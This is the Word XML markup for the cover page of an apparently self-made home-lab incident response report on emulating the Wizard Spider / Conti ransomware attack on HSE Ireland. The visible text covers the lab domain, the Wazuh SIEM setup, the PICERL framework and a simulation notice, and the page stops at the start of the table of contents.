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header6.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5.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9"/>
        <w:tblpPr w:vertAnchor="page" w:horzAnchor="page" w:leftFromText="180" w:rightFromText="180" w:tblpX="1148" w:tblpY="810"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="10840" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="600" w:type="dxa"/>
          <w:start w:w="480" w:type="dxa"/>
          <w:bottom w:w="600" w:type="dxa"/>
          <w:end w:w="480" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10840"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="14097" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10840" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:color="auto" w:fill="0D1B2A" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:bidi w:val="0"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="1600"/>
              <w:jc w:val="end"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="60" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>2065020</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="margin">
                    <wp:posOffset>1935480</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1969135" cy="1965960"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="1" name="Picture 8" descr="0064ff57-9aeb-4371-91ce-b71bf11e41d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0064ff57-9aeb-4371-91ce-b71bf11e41de-removebg-preview"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId2"/>
                          <a:srcRect l="27111" t="0" r="28257" b="10140"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1969135" cy="1965960"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
              <w:t>SPIDER WIZARD SOC HOME LAB</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="D6E4F0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>Incident Response Report</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="20"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="AED6F1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Wizard Spider / Conti Ransomware Emulation — HSE Ireland 2021</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="AED6F1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>PICERL Incident Response Framework</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="20"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D4AC0D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D4AC0D"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="4445" distB="5080" distL="0" distR="0" simplePos="0" relativeHeight="61" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>-129540</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>76200</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="6492240" cy="635"/>
                      <wp:effectExtent l="5080" t="5080" r="5080" b="5080"/>
                      <wp:wrapNone/>
                      <wp:docPr id="2" name="Straight Connector 1"/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="6492240" cy="720"/>
                              </a:xfrm>
                              <a:prstGeom prst="line">
                                <a:avLst/>
                              </a:prstGeom>
                              <a:ln w="9525">
                                <a:solidFill>
                                  <a:srgbClr val="4f81bd"/>
                                </a:solidFill>
                                <a:prstDash val="dash"/>
                                <a:round/>
                              </a:ln>
                            </wps:spPr>
                            <wps:style>
                              <a:lnRef idx="0">
                                <a:schemeClr val="accent1"/>
                              </a:lnRef>
                              <a:fillRef idx="0"/>
                              <a:effectRef idx="0"/>
                              <a:fontRef idx="minor"/>
                            </wps:style>
                            <wps:bodyPr/>
                          </wps:wsp>
                        </a:graphicData>
                      </a:graphic>
                    </wp:anchor>
                  </w:drawing>
                </mc:Choice>
                <mc:Fallback>
                  <w:pict>
                    <v:line id="shape_0" from="-10.2pt,6pt" to="500.95pt,6pt" stroked="t" o:allowincell="t" style="position:absolute">
                      <v:stroke color="#4f81bd" weight="9360" dashstyle="dash" joinstyle="round" endcap="flat"/>
                      <v:fill o:detectmouseclick="t" on="false"/>
                      <w10:wrap type="none"/>
                    </v:line>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="20"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D4AC0D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D4AC0D"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="9"/>
              <w:tblpPr w:vertAnchor="text" w:horzAnchor="page" w:leftFromText="180" w:rightFromText="180" w:tblpX="737" w:tblpY="444"/>
              <w:tblOverlap w:val="never"/>
              <w:tblW w:w="9286" w:type="dxa"/>
              <w:jc w:val="center"/>
              <w:tblInd w:w="0" w:type="dxa"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblCellMar>
                <w:top w:w="80" w:type="dxa"/>
                <w:start w:w="120" w:type="dxa"/>
                <w:bottom w:w="80" w:type="dxa"/>
                <w:end w:w="120" w:type="dxa"/>
              </w:tblCellMar>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="1771"/>
              <w:gridCol w:w="7515"/>
            </w:tblGrid>
            <w:tr>
              <w:trPr>
                <w:trHeight w:val="346" w:hRule="atLeast"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1771" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                    <w:start w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                    <w:end w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                  </w:tcBorders>
                  <w:shd w:color="auto" w:fill="1B3A5C" w:val="clear"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="Normal"/>
                    <w:widowControl/>
                    <w:spacing w:before="0" w:after="0"/>
                    <w:jc w:val="start"/>
                    <w:rPr>
                      <w:kern w:val="0"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="D6E4F0"/>
                      <w:kern w:val="0"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Lab Domain</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="7515" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                    <w:start w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                    <w:end w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                  </w:tcBorders>
                  <w:shd w:color="auto" w:fill="1A2F4A" w:val="clear"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="Normal"/>
                    <w:widowControl/>
                    <w:spacing w:before="0" w:after="0"/>
                    <w:jc w:val="start"/>
                    <w:rPr>
                      <w:kern w:val="0"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                      <w:color w:val="FFFFFF"/>
                      <w:kern w:val="0"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>spider.local  |  10.10.10.0/24</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr>
              <w:trPr>
                <w:trHeight w:val="359" w:hRule="atLeast"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1771" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                    <w:start w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                    <w:end w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                  </w:tcBorders>
                  <w:shd w:color="auto" w:fill="1B3A5C" w:val="clear"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="Normal"/>
                    <w:widowControl/>
                    <w:spacing w:before="0" w:after="0"/>
                    <w:jc w:val="start"/>
                    <w:rPr>
                      <w:kern w:val="0"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="D6E4F0"/>
                      <w:kern w:val="0"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Simulation</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="7515" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                    <w:start w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                    <w:end w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                  </w:tcBorders>
                  <w:shd w:color="auto" w:fill="152440" w:val="clear"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="Normal"/>
                    <w:widowControl/>
                    <w:spacing w:before="0" w:after="0"/>
                    <w:jc w:val="start"/>
                    <w:rPr>
                      <w:kern w:val="0"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                      <w:color w:val="FFFFFF"/>
                      <w:kern w:val="0"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Wizard Spider / Conti Ransomware — HSE Ireland 2021</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr>
              <w:trPr>
                <w:trHeight w:val="431" w:hRule="atLeast"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1771" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                    <w:start w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                    <w:end w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                  </w:tcBorders>
                  <w:shd w:color="auto" w:fill="1B3A5C" w:val="clear"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="Normal"/>
                    <w:widowControl/>
                    <w:spacing w:before="0" w:after="0"/>
                    <w:jc w:val="start"/>
                    <w:rPr>
                      <w:kern w:val="0"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="D6E4F0"/>
                      <w:kern w:val="0"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Framework</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="7515" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                    <w:start w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                    <w:end w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                  </w:tcBorders>
                  <w:shd w:color="auto" w:fill="1A2F4A" w:val="clear"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="Normal"/>
                    <w:widowControl/>
                    <w:spacing w:before="0" w:after="0"/>
                    <w:jc w:val="start"/>
                    <w:rPr>
                      <w:kern w:val="0"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                      <w:color w:val="FFFFFF"/>
                      <w:kern w:val="0"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>PICERL (Preparation → Identification → Containment → Eradication → Recovery → Lessons Learned)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr>
              <w:trPr>
                <w:trHeight w:val="359" w:hRule="atLeast"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1771" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                    <w:start w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                    <w:end w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                  </w:tcBorders>
                  <w:shd w:color="auto" w:fill="1B3A5C" w:val="clear"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="Normal"/>
                    <w:widowControl/>
                    <w:spacing w:before="0" w:after="0"/>
                    <w:jc w:val="start"/>
                    <w:rPr>
                      <w:kern w:val="0"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="D6E4F0"/>
                      <w:kern w:val="0"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>SIEM Platform</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="7515" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                    <w:start w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                    <w:end w:val="single" w:sz="6" w:space="0" w:color="1F5C99"/>
                  </w:tcBorders>
                  <w:shd w:color="auto" w:fill="152440" w:val="clear"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="Normal"/>
                    <w:widowControl/>
                    <w:spacing w:before="0" w:after="0"/>
                    <w:jc w:val="start"/>
                    <w:rPr>
                      <w:kern w:val="0"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                      <w:color w:val="FFFFFF"/>
                      <w:kern w:val="0"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Wazuh 4.7 — Manager + Dashboard (WAZUH01: 10.10.10.30)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="20"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D4AC0D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D4AC0D"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="20"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D4AC0D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D4AC0D"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="20"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D4AC0D"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D4AC0D"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SIMULATION NOTICE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FFFFFF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>All attack techniques were executed exclusively within an isolated lab environment against systems owned by the analyst. No real systems were compromised.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:sdt>
      <w:sdtPr>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique w:val="true"/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Normal"/>
            <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
            <w:ind w:hanging="0" w:start="0" w:end="0"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="Calibri"/>
              <w:color w:val="1A1A1A"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="SimSun" w:cs="Calibri" w:ascii="SimSun" w:hAnsi="SimSun"/>
              <w:color w:val="1A1A1A"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Normal"/>
            <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
            <w:ind w:hanging="0" w:start="0" w:end="0"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="Calibri"/>
              <w:color w:val="1A1A1A"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="SimSun" w:cs="Calibri" w:ascii="SimSun" w:hAnsi="SimSun"/>
              <w:color w:val="1A1A1A"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Normal"/>
            <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
            <w:ind w:hanging="0" w:start="0" w:end="0"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="Calibri"/>
              <w:color w:val="1A1A1A"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="SimSun" w:cs="Calibri" w:ascii="SimSun" w:hAnsi="SimSun"/>
              <w:color w:val="1A1A1A"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Normal"/>
            <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
            <w:ind w:hanging="0" w:start="0" w:end="0"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="Calibri"/>
              <w:color w:val="1A1A1A"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="SimSun" w:cs="Calibri" w:ascii="SimSun" w:hAnsi="SimSun"/>
              <w:color w:val="1A1A1A"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Normal"/>
            <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
            <w:ind w:hanging="0" w:start="0" w:end="0"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="Calibri"/>
              <w:color w:val="1A1A1A"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="SimSun" w:cs="Calibri" w:ascii="SimSun" w:hAnsi="SimSun"/>
              <w:color w:val="1A1A1A"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Normal"/>
            <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
            <w:ind w:hanging="0" w:start="0" w:end="0"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="Calibri"/>
              <w:color w:val="1A1A1A"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="SimSun" w:cs="Calibri" w:ascii="SimSun" w:hAnsi="SimSun"/>
              <w:color w:val="1A1A1A"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Normal"/>
            <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
            <w:ind w:hanging="0" w:start="0" w:end="0"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="Calibri"/>
              <w:color w:val="1A1A1A"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="SimSun" w:cs="Calibri" w:ascii="SimSun" w:hAnsi="SimSun"/>
              <w:color w:val="1A1A1A"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Normal"/>
            <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
            <w:ind w:hanging="0" w:start="0" w:end="0"/>
            <w:jc w:val="center"/>
            <w:rPr/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="SimSun" w:ascii="SimSun" w:hAnsi="SimSun"/>
              <w:sz w:val="21"/>
            </w:rPr>
            <w:t>Catalog</w:t>
          </w:r>
        </w:p>
        <w:p>
